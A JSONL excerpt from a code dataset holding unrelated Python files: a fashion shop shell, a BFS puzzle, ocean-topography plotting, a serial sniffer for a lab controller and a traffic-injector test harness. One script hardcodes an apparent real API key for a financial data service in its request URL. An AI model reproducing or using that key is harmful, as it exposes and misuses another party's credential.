returnToBattleScreen(self):\n bot = self.game_bot\n coordinates = self.coordinates\n\n bot.click(coordinates[\"x_icon\"])\n bot.click(coordinates[\"x_icon\"])\n","sub_path":"Firestone V2/actors/magic_quarter/MagicQuarter2.py","file_name":"MagicQuarter2.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"508041864","text":"\r\n\r\nimport shutil\r\n\r\n\r\npath_to_structures = 'C:/ShareSSD/scop/structures/'\r\nnew_path = 'C:/ShareSSD/scop/_send/'\r\n\r\nwith open('C:/ShareSSD/scop/auxi', 'r') as fp:\r\n\r\n line = fp.readline()\r\n while line:\r\n\r\n structure = str(line).strip().split()[0].split('/')[-1]\r\n\r\n shutil.copy(path_to_structures+structure, new_path+structure)\r\n\r\n line = fp.readline()\r\n","sub_path":"ResultsManagement/IsolateFiles.py","file_name":"IsolateFiles.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"189975711","text":"caffe_dir = 'caffe/' #path to your caffe directory\npycaffe_dir = caffe_dir + 'python/' #path to your pycaffe directory\n\nfeature_dir = 'lexical_features/' #path to store extracted features\ncoco_annotations = 'annotations/' #download these annotations from the MSCOCO site\ncoco_images_root = 'coco_images/' #download these images from MSCOCO site\nimagenet_images_root = 'dcc_imagenet/' #subset of imagenet dataset collected for DCC\ncoco_caption_eval = 'coco-caption-eval/' #eval tools from MSCOCO site\ncaption_weights_root = 'snapshots/' #wherever you store your snapshots\npretrained_lm = 'snapshots/'\nmodels_root = 'snapshots/'\nvocab_root = 'utils/vocabulary/'\n","sub_path":"utils/config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72735868","text":"'''\nImplrements a Python Command Shell version of the\nFashion Shop application\n'''\n\nfrom ShellUI.BTCInput import *\n\nfrom Storage.StockItem import StockItem\n\nclass FashionShopShell:\n '''\n Provides a Command Shell interface for use by\n the Fashion Shop application\n '''\n\n def __init__(self, filename, storage_class):\n '''\n Manages the fashion shop data\n Displays a message if the load fails and creates a new shop\n '''\n FashionShopShell.__filename = filename\n try:\n self.__shop = storage_class.load(filename)\n except:\n print('Fashion shop not loaded.')\n print('Creating an empty fashion shop')\n self.__shop = storage_class()\n\n def create_new_stock_item(self):\n '''\n Creates a new stock item. Gets the details of the item, \n creates it and then stores it in the shop\n '''\n\n stock_ref = read_text('Enter stock reference: ')\n price = read_float_ranged(prompt='Enter price: ',\n min_value=StockItem.min_price,\n max_value=StockItem.max_price)\n tag_string = read_text('Enter tags (separated by commas): ')\n\n tags = StockItem.get_tag_set_from_text(tag_string)\n\n new_item = StockItem(stock_ref=stock_ref, price=price, tags=tags)\n\n try:\n self.__shop.store_new_stock_item(new_item)\n print('Item stored')\n except Exception as e:\n print('Item not stored ')\n print(e)\n\n def add_stock(self):\n '''\n Adds stock to an existing stock item\n Searches for the item first, and then gets the \n number of stock items to add\n '''\n print('Add stock')\n\n item_stock_ref = read_text('Enter the stock reference: ')\n\n item = self.__shop.find_stock_item(item_stock_ref)\n \n if item == None:\n print('This stock item was not found')\n return\n\n print(item)\n\n number_to_add = read_int_ranged('Number to add (0 to abandon): ',\n 0, StockItem.max_stock_add)\n\n if number_to_add == 0:\n print('No items added')\n else:\n item.add_stock(number_to_add)\n print(item)\n\n def sell_stock(self):\n '''\n Sells stock. Searches for the item and then reads the\n number of items that are being sold.\n Will not allow more items to be sold than are in stock\n '''\n print('Sell item')\n\n item_stock_ref = read_text('Enter the stock reference: ')\n\n item = self.__shop.find_stock_item(item_stock_ref)\n\n if item == None:\n print('This item was not found')\n return\n\n print('Selling')\n print(item)\n\n if item.stock_level == 0:\n print('There are none in stock')\n return\n\n number_sold = read_int_ranged('How many sold (0 to abandon): ',\n 0,\n item.stock_level)\n\n if number_sold == 0:\n print('Sell item abandoned')\n return\n\n item.sell_stock(number_sold)\n\n print('Items sold')\n\n def do_report(self):\n print('Stock report')\n print(self.__shop)\n\n def do_tag_filter(self):\n print('Filter on tags')\n tag_string = read_text('Enter the tags to look for (separated by commas): ')\n search_tags = StockItem.get_tag_set_from_text(tag_string)\n items = self.__shop.find_matching_with_tags(search_tags)\n stock = map(str,items)\n stock_list = '\\n'.join(stock)\n template = '''Matching items\n\n{0}\n'''\n print(stock_list)\n\n def main_menu(self):\n\n prompt = '''Mary's Fashion Shop\n\n1: Create new stock item\n2: Add stock to existing item\n3: Sell stock\n4: Stock report\n5: Find on tags\n6: Exit\n\nEnter your command: '''\n\n while(True):\n command = read_int_ranged(prompt, 1, 7)\n if command == 1:\n self.create_new_stock_item()\n elif command == 2:\n self.add_stock()\n elif command == 3:\n self.sell_stock()\n elif command == 4:\n self.do_report()\n elif command == 5:\n self.do_tag_filter()\n elif command == 6:\n self.__shop.save(FashionShopShell.__filename)\n print('Shop data saved')\n break\n","sub_path":"12. Python applications/EG12-10 TestFashionShopApp Doc/ShellUI/FashionShopShell.py","file_name":"FashionShopShell.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"428557188","text":"import pandas as pd\r\nimport requests\r\nimport json\r\n\r\ndf = pd.read_excel('Tickers.xlsx')\r\nCompanies = pd.DataFrame()\r\n\r\nfor i in df['Ticker names']:\r\n apiPath = 'https://financialmodelingprep.com/api/v3/ratios/'+str(i)+'?apikey=68aff3a70cc7e28159a88646ab58c6d0'\r\n finInfo = requests.get(apiPath)\r\n if(finInfo.json()):\r\n print(finInfo.json())\r\n data = finInfo.json()[0]\r\n print(data)\r\n Companies = Companies.append(pd.json_normalize(data), ignore_index = True)\r\n\r\n\r\nprint(Companies)\r\nwriter = pd.ExcelWriter('FinRatios.xlsx')\r\nCompanies.to_excel(writer,'CompanyInfo')\r\nwriter.save()","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481397538","text":"import os\nimport collections\n\n\ndef bfs(graph, start, end):\n queue = collections.deque()\n visted = set()\n distance = {}\n\n distance[start] = 0\n visted.add(start)\n queue.append(start)\n while (queue):\n current = queue.popleft()\n if current == end:\n return distance[current]\n\n for child in graph[current]:\n if child not in visted:\n distance[child] = distance[current] + 1\n queue.append(child)\n visted.add(child)\n\n raise Exception('NOT FOUND')\n\n\nfilepath = f'{os.getcwd()}/Q6/input.txt'\nwith open(filepath, 'r') as f:\n data = f.read().splitlines()\n\n# build graph\nYOU, SANTA = None, None\ngraph = {}\nfor orbit in data:\n a, b = orbit.split(')')\n # init child arrays if needed\n if a not in graph:\n graph[a] = []\n if b not in graph:\n graph[b] = []\n\n # add children\n graph[a].append(b)\n graph[b].append(a)\n\n # track out starting locations\n if b == 'YOU':\n YOU = a\n if b == 'SAN':\n SANTA = a\n\ndistance = bfs(graph, YOU, SANTA)\n\nprint(distance)\n","sub_path":"Q6/Q6P2.py","file_name":"Q6P2.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"606450445","text":"posActuelle = int(input())\r\nnbVillages = int(input())\r\nnbAccessibles = 0\r\nfor loop in range(nbVillages):\r\n posVillage = int(input())\r\n ecart = posActuelle - posVillage\r\n if ecart < 0:\r\n ecart = -ecart\r\n if ecart <= 50:\r\n nbAccessibles = nbAccessibles + 1\r\nprint(nbAccessibles)","sub_path":"France_ioi/Level 1/Chapitre 6/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388612998","text":"import read_data as rd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport argparse\nimport dip_func as df\nfrom mdt_calculations.plotting import geo_plot_w_subplots as gp\nimport read_data as rd\nfrom PIL import Image\nfrom skimage.transform import resize\nfrom scipy.interpolate import make_interp_spline\nfrom matplotlib.patches import Circle\nfrom skimage.metrics import peak_signal_noise_ratio\nfrom skimage.metrics import structural_similarity as ssim\n\n\ndef plot_from_coord(arr, coord, window=20, vmin=0, vmax=1.4):\n fig, ax = plt.subplots()\n ax.imshow(arr[coord[0]-window:coord[0]+window, coord[1]-window:coord[1]+window], vmin=vmin, vmax=vmax, cmap='turbo')\n circ = Circle(coord, 50)\n ax.add_patch(circ)\n plt.show()\n\n\ndef compute_std_from_coords(arrs, coords, window=3):\n std_coords = []\n for coord in coords:\n coords_across_arrs = []\n for arr in arrs:\n coords_across_arrs.append(arr[coord[0]-window:coord[0]+window, coord[1]-window:coord[1]+window])\n std_coords.append(np.std(coords_across_arrs))\n return std_coords\n\n\ndef compute_std_across_arrs(arrs):\n arr_stack = np.stack(arrs)\n return np.std(arr_stack, axis=0)\n\n\ndef compute_psnr_against_reference_coords(arrs, reference, coords, window=5):\n errors = []\n for arr in arrs:\n ref_windows = []\n pred_windows = []\n for coord in coords:\n ref_windows.append(reference[coord[0]:coord[0]+window, coord[1]:coord[1]+window])\n pred_windows.append(arr[coord[0]:coord[0]+window, coord[1]:coord[1]+window])\n ref_window_arr = np.stack(ref_windows)\n pred_window_arr = np.stack(pred_windows)\n error = peak_signal_noise_ratio(ref_window_arr, pred_window_arr, data_range=10)\n errors.append((error))\n return np.array(errors)\n\n\ndef compute_ssim_against_reference_coords(arrs, reference, coords, window=7):\n errors = []\n for arr in arrs:\n ssims = []\n for coord in coords:\n ref_window = reference[coord[0]:coord[0]+window, coord[1]:coord[1]+window]\n pred_window = arr[coord[0]:coord[0]+window, coord[1]:coord[1]+window]\n ssim_val = ssim(ref_window, pred_window, data_range=10, win_size=min(7, window))\n ssims.append(ssim_val)\n error = np.mean(ssims)\n errors.append(error)\n return np.array(errors)\n\n\ndef compute_errors_against_reference(arrs, reference):\n errors = []\n for arr in arrs:\n error = np.mean((arr - reference) ** 2)\n errors.append(error)\n return np.array(errors)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\", \"--iterations\", type=int, default=2000, help=\"number of iterations\")\nparser.add_argument(\"-k\", \"--kernel_size\", type=int, default=0, help=\"kernel size for mean reg\")\nparser.add_argument(\"-r\", \"--run_number\", type=int, default=5, help=\"chosen run number\")\nparser.add_argument(\"-l1\", \"--lambda_mean_reg\", type=float, default=0.0, help=\"strength of mean reg\")\nparser.add_argument(\"--model_key\", type=str, default=\"DIP\", help=\"name of model\")\nparser.add_argument(\"--region\", type=str, default=\"global\", help=\"region size on which model was trained\")\nparser.add_argument(\"--mdt_filename\", type=str, default=\"dtu18_gtim5_do0280_rr0004.dat\", help=\"name of mdt to denoise\")\nparser.add_argument(\"--from_checkpoint\", dest=\"from_checkpoint\", action=\"store_true\", help=\"train from last save\")\nparser.add_argument(\"-re\", \"--region_extent\", type=str, default=\"global\", help=\"region extent of plot\")\nparser.add_argument(\"-p\", \"--product\", type=str, default=\"mdt\", help=\"product type of plot: mdt or cs\")\nparser.add_argument(\"--log\", dest=\"log\", action=\"store_true\", help=\"log scale\")\nargs = parser.parse_args()\n\nnum_iter = args.iterations\nrun_number = args.run_number\nk = args.kernel_size\nregion = args.region\nmodel_key = args.model_key\nlambda_mean_reg = args.lambda_mean_reg\nregion_extent = args.region_extent\nproduct = args.product\nlog = args.log\nfilepath = os.path.join('data', args.mdt_filename)\n\n# modify me when/if new params are added\nparam_string = f\"region={region}-k={k}-l1={lambda_mean_reg}\"\n# save format = modelname / region&kernel / mdtname\nsave_dir = os.path.join('./results', model_key, region, param_string, args.mdt_filename[:-4])\nsave_dir = os.path.join(save_dir, str(run_number))\n\ncentral_lon = 0\nbds = {'mdt': [-1.4, 1.4], 'cs': [0, 1.4]}\nvmin, vmax = bds[product]\nnum_iters = np.arange(100, 4400, 100)\n\nlist_dict = []\narr_of_dips = []\nfor num_iter in num_iters:\n if product == 'cs':\n arr_of_dips.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}_cs_band20.dat',\n os.path.join(save_dir, 'currents')))))\n elif product == 'mdt':\n arr_of_dips.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}.dat', os.path.join(save_dir, 'dats')))))\n dict_item = {'extent': f'{region_extent}', 'product': f'{product}', 'log': log}\n list_dict.append(dict_item)\n\niteration_figsize = (17, 10)\nstandard_figsize = (16, 16)\nxlabels = ['(a)', '(b)', '(c)', '(d)', '(e)', '(f)', '(g)', '(h)']\nxlabels = [str(item) for item in num_iters]\n\nprod_dict = {'cs': ['cs', 'currents', '_cs_band10'], 'mdt': ['mdt', 'mdts', '']}\nif product == 'cs':\n cls_name = 'cls18'\nelse:\n cls_name = 'cls18_rr0004'\ncls18 = np.rot90(rd.read_surface(f'{cls_name}{prod_dict[product][2]}.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}'))\nnemo = np.rot90(rd.read_surface(f'orca0083_mdt_12th{prod_dict[product][2]}.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}'))\n\nplot_reference = False\nif plot_reference:\n gp.plot(cls18, product=f'{prod_dict[product][0]}', vmin=vmin, vmax=vmax, central_lon=180)\n gp.plot(nemo, product=f'{prod_dict[product][0]}', vmin=vmin, vmax=vmax, central_lon=180)\ncls18_res4 = resize(cls18, (720, 1440), order=2)\nnemo_res4 = resize(nemo, (720, 1440), order=2)\n\nplot_original = False\norig_mdt = np.rot90(rd.read_surface(f'dtu18_gtim5_do0280_rr0004{prod_dict[product][2]}.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}'))\nif plot_original:\n gp.plot(np.rot90(orig_mdt), product=f'{prod_dict[product][0]}', vmin=0, vmax=2, central_lon=180)\n\nplot_iterations_psnr = False\nif plot_iterations_psnr:\n coords = [(229, 1131), (248, 1120), (263, 1090), (250, 1167), (576, 1260), (40, 260), (600, 540)]\n cls_errors = compute_psnr_against_reference_coords(arr_of_dips, cls18_res4, coords, window=5)\n nemo_errors = compute_psnr_against_reference_coords(arr_of_dips, nemo_res4, coords, window=5)\n avg_errors = (cls_errors + nemo_errors)/2\n\n cls_glb_errors = compute_errors_against_reference(arr_of_dips, cls18_res4)\n nemo_glb_errors = compute_errors_against_reference(arr_of_dips, cls18_res4)\n\n num_iters_spline = np.linspace(num_iters.min(), num_iters.max(), 150)\n cls_errors_spline = make_interp_spline(num_iters, cls_errors)\n cls_errors_spline = cls_errors_spline(num_iters_spline)\n nemo_errors_spline = make_interp_spline(num_iters, nemo_errors)\n nemo_errors_spline = nemo_errors_spline(num_iters_spline)\n avg_errors = make_interp_spline(num_iters, avg_errors)\n avg_errors = avg_errors(num_iters_spline)\n fig, ax = plt.subplots(1, 1)\n ax.plot(num_iters_spline, cls_errors_spline, linestyle='--', label='CNES-CLS18 Error', linewidth=1)\n ax.plot(num_iters_spline, nemo_errors_spline, linestyle='--', label='NEMO Error', linewidth=1)\n ax.plot(num_iters_spline, avg_errors, label='Average Error', linewidth=1)\n ax.axvline(x=800, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.axvline(x=3200, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.set_xlabel('Iterations')\n ax.set_ylabel('PSNR')\n ax.set_xlim([0, 4400])\n ax.grid()\n ax.legend()\n plt.show()\n\nplot_iterations_ssim = False\nif plot_iterations_ssim:\n coords = [(229, 1131), (248, 1120), (263, 1090), (250, 1167), (576, 1260), (40, 260), (600, 540)]\n cls_errors = compute_ssim_against_reference_coords(arr_of_dips, cls18_res4, coords, window=3)\n nemo_errors = compute_ssim_against_reference_coords(arr_of_dips, nemo_res4, coords, window=3)\n avg_errors = (cls_errors + nemo_errors)/2\n\n cls_glb_errors = compute_errors_against_reference(arr_of_dips, cls18_res4)\n nemo_glb_errors = compute_errors_against_reference(arr_of_dips, cls18_res4)\n\n num_iters_spline = np.linspace(num_iters.min(), num_iters.max(), 150)\n cls_errors_spline = make_interp_spline(num_iters, cls_errors)\n cls_errors_spline = cls_errors_spline(num_iters_spline)\n nemo_errors_spline = make_interp_spline(num_iters, nemo_errors)\n nemo_errors_spline = nemo_errors_spline(num_iters_spline)\n avg_errors = make_interp_spline(num_iters, avg_errors)\n avg_errors = avg_errors(num_iters_spline)\n fig, ax = plt.subplots(1, 1)\n ax.plot(num_iters_spline, cls_errors_spline, linestyle='--', label='CNES-CLS18 Error', linewidth=1)\n ax.plot(num_iters_spline, nemo_errors_spline, linestyle='--', label='NEMO Error', linewidth=1)\n ax.plot(num_iters_spline, avg_errors, label='Average Error', linewidth=1)\n ax.axvline(x=800, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.axvline(x=3200, color='0.8', linestyle='dashed', linewidth=1.5)\n ax.set_xlabel('Iterations')\n ax.set_ylabel('SSIM')\n ax.set_xlim([0, 4400])\n ax.grid()\n ax.legend()\n plt.show()\n\n\ncoords_for_stds = [(238, 1120), (228, 540), (511, 99), (531, 1205), (263, 1090), (576, 1260)]\nstds_coords = compute_std_from_coords(arr_of_dips, coords_for_stds)\n# Plot to see where coordinate is\n# for coord in coords_for_stds:\n# plot_from_coord(arr_of_dips[17], coord)\nplot_std = False\nif plot_std:\n # get rid of cbar title for this\n std_arr_stack = compute_std_across_arrs(arr_of_dips[7:31])\n list_dicts_stds = [{'extent': 'gs_big', 'product': 'std'},\n {'extent': 'ku_big', 'product': 'std'},\n {'extent': 'ag', 'product': 'std'},\n {'extent': 'bm3', 'product': 'std'}]\n stds_labels = ['(a)', '(b)', '(c)', '(d)']\n gp.geo_subplots([std_arr_stack, std_arr_stack, std_arr_stack, std_arr_stack],\n list_dicts_stds, 2, 2, vmin=0, vmax=0.4,\n figsize=iteration_figsize, xlabels=stds_labels, ticksize=10)\n\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='gs_big')\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='ku_big')\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='bm')\n # gp.plot(std_arr_stack, product=f'std', vmin=0, vmax=0.4, central_lon=180, extent='ag')\n\n# Residual plot\n# gp.plot((arr_of_dips[21]-arr_of_dips[17]), product=f'{prod_dict[product][0]}', vmin=0, vmax=0.5, central_lon=180, cmap='viridis')\n\n# Average over less iterations\n# gp.plot(np.mean(arr_of_dips[16:22], axis=0), product=f'{prod_dict[product][0]}', vmin=0, vmax=2, central_lon=180)\n\n\nnum_iters_window_plot = np.arange(200, 4400, 400)\nnum_iters_window_plot = np.array([100, 200, 400, 800, 1200, 1600, 2000, 2400, 2800, 3200, 3600, 4000])\nlist_dict_window_plot = []\narr_dips_window = []\nxlabels_window = [str(item) for item in num_iters_window_plot]\nfor num_iter in num_iters_window_plot:\n if product == 'cs':\n arr_dips_window.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}_cs_band20.dat',\n os.path.join(save_dir, 'currents')))))\n elif product == 'mdt':\n arr_dips_window.append(np.flipud(np.rot90(rd.read_surface(f'{num_iter}.dat', os.path.join(save_dir, 'dats')))))\n dict_item = {'extent': f'{region_extent}', 'product': f'{product}', 'log': log}\n list_dict_window_plot.append(dict_item)\n\nplot_snapshot_over_iterations = False\nif plot_snapshot_over_iterations:\n gp.geo_subplots(arr_dips_window, list_dict_window_plot, 3, 4, vmin=vmin, vmax=vmax, figsize=iteration_figsize, cbarlabelsize=14,\n ticksize=12, xlabels=xlabels_window)\n\nplot_snapshot = False\nlist_dicts_snapshot = [{'extent': 'gs', 'product': 'cs'},\n {'extent': 'ku', 'product': 'cs'},\n {'extent': 'ag', 'product': 'cs'},\n {'extent': 'bm', 'product': 'cs'}]\nsnapshot_labels = ['(a)', '(b)', '(c)', '(d)']\nif plot_snapshot:\n coords = [(103, 32), (-45, 32), (-155, -35), (121, -43), (-50, -40), (-108, -36), (116, 28), (-40, 25)]\n # gp.plot(arr_of_dips[15], product=product, vmin=vmin, vmax=vmax, extent='global', markers=coords)\n # gp.geo_subplots([arr_of_dips[15], arr_of_dips[15], arr_of_dips[15], arr_of_dips[15]],\n # list_dicts_snapshot, 2, 2, vmin=vmin, vmax=vmax,\n # figsize=iteration_figsize, xlabels=snapshot_labels)\n gp.polar_plot(arr_of_dips[15], product=product, vmin=vmin, vmax=vmax)\n\nplot_avg = True\navg_iterations = np.mean(arr_of_dips[14:19], axis=0)\nif plot_avg:\n gp.plot(avg_iterations, product=product, vmin=vmin, vmax=vmax, extent='global')\n gp.polar_plot(avg_iterations, product=product, vmin=vmin, vmax=vmax)\n\nif product == 'cs':\n gauss_mdt = np.rot90(rd.read_surface('dtu18_GTIM_R5_do0280_rr0004_100k_cs.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}/gauss_filtered_mdts_cs/geodetic'))\nelse:\n gauss_mdt = np.rot90(rd.read_surface('dtu18_GTIM5_R6e_do0280_rr0004_100k.dat',\n f'../a_mdt_data/computations/{prod_dict[product][1]}/gauss_filtered_mdts'))\nplot_gaussian = False\nif plot_gaussian:\n gp.plot(gauss_mdt, product=product, vmin=vmin, vmax=vmax, extent='global')\n\nlist_dicts_residual = [{'extent': 'gs', 'product': 'mdt', 'vmin': vmin, 'vmax': vmax},\n {'extent': 'gs', 'product': 'mdt', 'vmin': vmin, 'vmax': vmax},\n {'extent': 'gs', 'product': 'residual', 'vmin': -0.5, 'vmax': 0.5}]\nresid_labels = ['(a)', '(b)', '(c)']\nplot_residual = False\nif plot_residual:\n gp.geo_subplots([orig_mdt, avg_iterations, orig_mdt-avg_iterations],\n list_dicts_residual, 1, 3, vmin=None, vmax=None,\n figsize=iteration_figsize, xlabels=resid_labels)\n\nplot_dip_gauss_residual = False\nif plot_dip_gauss_residual:\n gp.geo_subplots([avg_iterations, gauss_mdt, avg_iterations-gauss_mdt],\n list_dicts_residual, 1, 3, vmin=None, vmax=None,\n figsize=iteration_figsize, xlabels=resid_labels)\n\n# df.compute_currents_from_dat(f'../a_mdt_data/computations', 'dtu18_gtim5_do0280_rr0004')\n\n\nif product =='cs':\n pmf_mdt = np.flipud(np.rot90(rd.read_surface('fmdt_01_L280_55_cs_band20.dat',\n f'../MDT-Calculations/pmf_stuff/io/{prod_dict[product][1]}')))\nelse:\n pmf_mdt = np.flipud(np.rot90(rd.read_surface('fmdt_01_L280_82.dat',\n f'../MDT-Calculations/pmf_stuff/io/{prod_dict[product][1]}')))\n# pmf_mdt = resize(pmf_mdt, (720, 1440), order=2)\n\nplot_dip_pmf_residual = False\nif plot_dip_pmf_residual:\n gp.geo_subplots([avg_iterations, pmf_mdt, avg_iterations-pmf_mdt],\n list_dicts_residual, 1, 3, vmin=-0.7, vmax=0.7,\n figsize=iteration_figsize, xlabels=resid_labels)\n","sub_path":"plot_dip.py","file_name":"plot_dip.py","file_ext":"py","file_size_in_byte":15291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"147058555","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\n# thermo-fht6020.py\r\n\r\n# Simple sniffer script which prints on the screen the serial messages exchanged between a Thermo\r\n# Fisher Scientific FHT 6020 controller and a PC.\r\n\r\n# Python modules required: pyserial.\r\n# Tested with Python 2.7.12 and pyserial 3.4.\r\n\r\n# Necessary modules\r\n\r\nimport serial\r\nimport sys\r\n\r\n# Serial interface, configured as described in the FHT 6020 manual\r\n\r\ninterface = serial.Serial(port = \"/dev/ttyUSB0\",\r\n baudrate = 19200,\r\n bytesize = serial.SEVENBITS,\r\n parity = serial.PARITY_EVEN,\r\n stopbits = serial.STOPBITS_TWO)\r\n\r\n# Loop\r\n\r\nwhile (True):\r\n new_character = interface.read(1)\r\n if (new_character == \"\\x07\"):\r\n sys.stdout.write(\"\")\r\n elif (new_character == \"\\x03\"):\r\n sys.stdout.write(\"\\n\")\r\n elif (new_character == \"\\x15\"):\r\n sys.stdout.write(\"\\n\")\r\n elif (new_character == \"\\x06\"):\r\n sys.stdout.write(\"\\n\")\r\n else:\r\n sys.stdout.write(new_character)\r\n","sub_path":"thermo-fht6020.py","file_name":"thermo-fht6020.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"271674199","text":"# -*- coding: iso-8859-1 -*-\n#\n# $Id: NSInjector.py,v 1.7.2.5.2.7 2013/03/19 09:32:15 elorlpe Exp $\n#\n# Copyright (c) Ericsson España S.A., 2011.\n# All rights reserved.\n#\n# This product or document is proprietary to and embodies the\n# confidential technology of Ericsson España S.A.\n# Possession, use, duplication or distribution of this product\n# or document is authorized only pursuant to a valid written\n# license from Ericsson España S.A\n#\n\"\"\"\nAbstraction for handling a trafeIns injector. If there's a SSH connection associated \nto the object it will use it, or it will try to inject locally if there's no such\nassociation.\n\"\"\"\n\nimport logging\nimport os\nimport time\nimport sys\nimport traceback\nfrom NSTpyfw.injector import Injector\nfrom utils.oamCommands import OAMCommands\n\nclass NSInjector(Injector):\n \"\"\"\n Handles a NSinjector injector \n\n @ivar RETURN_CODE_VALUES: The available return codes when a trafraio module is used:\n - SUCCESS: No errors\n - NOT_LOADED: The trafrawio module is not loaded yet.\n - READY: The trafrawio module is ready to be used.\n - ALREADY_EXISTS: The trafrawio module is already loaded.\n \"\"\"\n\n RETURN_CODE_VALUES = {\"SUCCESS\": 0, \"NOT_LOADED\": 1,\n \"READY\": 22, \"ALREADY_EXISTS\": 114}\n\n _SLEEPING_TIME = 1 # We keep asking the injector for \n _N_TRIES = 120 # _SLEEPING_TIME * _N_TRIES seconds.\n\n _QUERY_STATUS = \"ns config injector show status;\"\n _QUERY_LOADED = \"ns config injector;\"\n _UNLOAD_INJECTOR = \"ns module stop injector;\"\n _LOAD_INJECTOR = \"ns module start injector %s injector.mod;\"\n\n def __init__(self, run_files=1, partition=1, process_name=\"pmain\"):\n \"\"\"\n Init Injector\n\n\t@param partition: Partition where file will be injected (defaults to 1)\n\t@type partition: int\n\n\t@param run_files: If trace file is split into several parts, run_files is the\n\t\t\t number of parts to inject (defaults to 1)\n\t@type run_files: int\n \"\"\"\n super(NSInjector, self).__init__()\n \n self.partition = partition\n self.run_files = run_files\n self.process_name = process_name\n self.logger = logging.getLogger('NSTlogger')\n\n def set_cell_ip(self, cell_ip):\n self.cell_ip = cell_ip\n self.pool = self.cell_ip\n \n def _setup_sasn_env(self):\n self.run_injection_command('ns config vr set redun manual master id 1;',\n partition = 0)\n\n def _start_injector_module(self):\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n if retval == NSInjector.RETURN_CODE_VALUES[\"READY\"]:\n self.logger.debug(\"NSInjector module already started. Doing nothing.\")\n return\n\n retval, _, _ = self.run_injection_command(\\\n NSInjector._LOAD_INJECTOR % (self.process_name,))\n assert retval == NSInjector.RETURN_CODE_VALUES[\"SUCCESS\"] or \\\n retval == NSInjector.RETURN_CODE_VALUES[\"ALREADY_EXISTS\"]\n\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n assert retval == NSInjector.RETURN_CODE_VALUES[\"READY\"]\n\n def _stop_injector_module(self):\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n if retval == NSInjector.RETURN_CODE_VALUES['NOT_LOADED']:\n self.logger.debug(\"NSInjector module already stopped. Doing nothing.\")\n return \n\n retval, _, _ = self.run_injection_command(NSInjector._UNLOAD_INJECTOR)\n assert retval == NSInjector.RETURN_CODE_VALUES['SUCCESS']\n\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n assert retval == NSInjector.RETURN_CODE_VALUES['NOT_LOADED']\n\n def _restart_injector_module(self):\n self._stop_injector_module()\n self._start_injector_module()\n\n def _inject_traffic(self):\n actions = [\"ns config injector delete pool all;\",\n \"ns config injector set pool %s;\" % (self.cell_ip,),\n OAMCommands().retrieve_set_anon_session()+\";\",\n \"ns config scm plugin canalyzer set pkt-mark enable off;\",\n \"ns config scm plugin canalyzer set pkt-mark enable on;\",\n \"ns config scm plugin canalyzer delete rule-matches;\",\n \"ns config injector start /tmp/.injector\"]\n\n files = sorted(os.listdir(self.capture_file))\n assert files\n\n files = [os.path.join(self.capture_file, aux) \\\n for aux in files if not aux.endswith('.xml')]\n\n with open(\"/tmp/.injector\", \"w\") as f:\n f.write(files[0])\n\n with open(\"/tmp/traces_list\", \"w\") as f:\n f.write('\\n'.join(files))\n\n for act in actions:\n retval, stdout, _ = self.run_injection_command(act)\n assert retval == 0, \"Command: '%s' exited with code: %d - %s\" % \\\n (act, retval, stdout)\n \n def _wait_until_injection_finished(self):\n \"\"\"\n Wait until the injection has finished, polling every 1 second\n to its status\n \"\"\"\n retval, stdout, _ = None, None, None\n for _ in range(NSInjector._N_TRIES):\n retval, stdout, _ = self.run_injection_command(\\\n NSInjector._QUERY_STATUS)\n if retval == 0:\n if 'Not running.' in stdout:\n break\n time.sleep(NSInjector._SLEEPING_TIME)\n\n if retval == 1:\n self.logger.warning(\"Command: '%s' returned: %s (%d).\" %\n (NSInjector._QUERY_STATUS, stdout, retval))\n self.logger.warning(\"Restarting NSInjector...\")\n self._restart_injector_module()\n\n assert retval == 0 and 'Not running.' in stdout\n\n def _free_resources(self):\n if os.path.isfile( \"/tmp/traces_list\" ):\n os.remove( \"/tmp/traces_list\" )\n if os.path.isfile( \"/tmp/.injector\" ):\n os.remove( \"/tmp/.injector\" )\n\n def run_injection_command(self, command_str, partition=None):\n part = self.partition if partition is None else partition\n cmd = 'ns partition set %d; %s' % (part, command_str)\n\n return super(NSInjector, 